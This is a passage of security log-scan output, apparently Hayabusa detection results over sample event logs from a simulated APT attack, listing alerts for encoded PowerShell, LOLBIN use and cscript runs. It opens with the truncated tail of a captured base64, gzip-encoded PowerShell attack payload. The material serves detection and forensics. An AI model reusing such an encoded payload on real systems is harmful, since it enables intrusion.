System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134J
VR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:47.113 
+00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:47.113 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted 
payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:57:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:57:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:58:03.005 
+00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:58:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:58:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:59:03.029 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:59:03.029 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 
+2021-04-21 15:00:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.228 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.228 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.482 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.482 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with 
service over SMB (GLOBAL).evtx" +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:01:03.003 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:01:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:01:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 
15:02:03.009 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:02:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:02:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:03:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:03:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:03:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:04:03.010 
+00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:04:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:04:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:04:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
